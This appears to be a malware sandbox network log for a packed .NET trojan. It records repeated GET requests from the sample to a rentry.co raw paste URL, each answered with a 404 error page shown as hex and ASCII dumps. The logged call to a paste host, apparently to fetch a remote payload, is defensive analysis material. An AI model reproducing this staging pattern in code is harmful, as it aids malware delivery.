                                                                                        2024-10-18 10:44:13 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:13 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:13 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:13 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 38 65 31 38 63 31 34 37 34 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4d 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee8e18c14743',t:'MTcyOTI0ODI1My4wMDAwMD
                                                                                        2024-10-18 10:44:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        77192.168.2.660737104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:14 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:14 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:14 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvKoj0i7cKoukELsCbhtny6r5wA4SJVYvZ%2B952AEWLbmDuv4%2FGf6K%2BIlH2KCenlw69M9PNtlJ4C8Trmrfj0byksZwP8GV876Sjhez2plRgSQ%2FWhUUF4CJPSnBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee945d1945e3-DFW
                                                                                        2024-10-18 10:44:14 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:14 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:14 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:14 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 39 34 35 64 31 39 34 35 65 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4e 43 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee945d1945e3',t:'MTcyOTI0ODI1NC4wMD
                                                                                        2024-10-18 10:44:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        78192.168.2.660738104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:15 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:16 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:15 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GgttGctQd87XSj6%2B2cmceVf5GULcRIA0O1r9L6MQtojxaZYn24CUxuXtC%2FF7%2Br3n%2BCuSXqUT4UyPgHvK4AMHl0lhsT10MQFgTGFMCY2tuonUXW9jFrxzM%2F1IGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee9c6bdeeb37-DFW
                                                                                        2024-10-18 10:44:16 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:16 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:16 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:16 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 39 63 36 62 64 65 65 62 33 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4e 53 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee9c6bdeeb37',t:'MTcyOTI0ODI1NS4wMD
                                                                                        2024-10-18 10:44:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        79192.168.2.660740104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:16 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:17 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:16 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSDyI7ZwAZvsKwNMg%2F0XeVhrC%2FWq117F83VhHPOhfah4220b5WMLTFUaQxYNCsI0phSOgqGlhsz0cfbReCGw3OrN%2BkqaHt%2FwPua9prZiJetLDnGSy3uWHtrhfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eea4fb56e9ce-DFW
                                                                                        2024-10-18 10:44:17 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:17 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:44:17 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:17 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 61 34 66 62 35 36 65 39 63 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4e 69 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eea4fb56e9ce',t:'MTcyOTI0ODI1Ni4wMDAw
                                                                                        2024-10-18 10:44:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        80192.168.2.660742104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:17 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:18 UTC681INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:18 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0KzVyXfp0FpIRfspOSTcpIagGKN9IRjcs02zQQ5na%2FV54OR8JdrJH6wMwFuZBY5DlvWLfDU76BGLh4PE86MLvxx%2Bm%2B4dFnYaIGcKBzSk7DOkhr123P2U3%2FGqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eeac8d330bc7-DFW
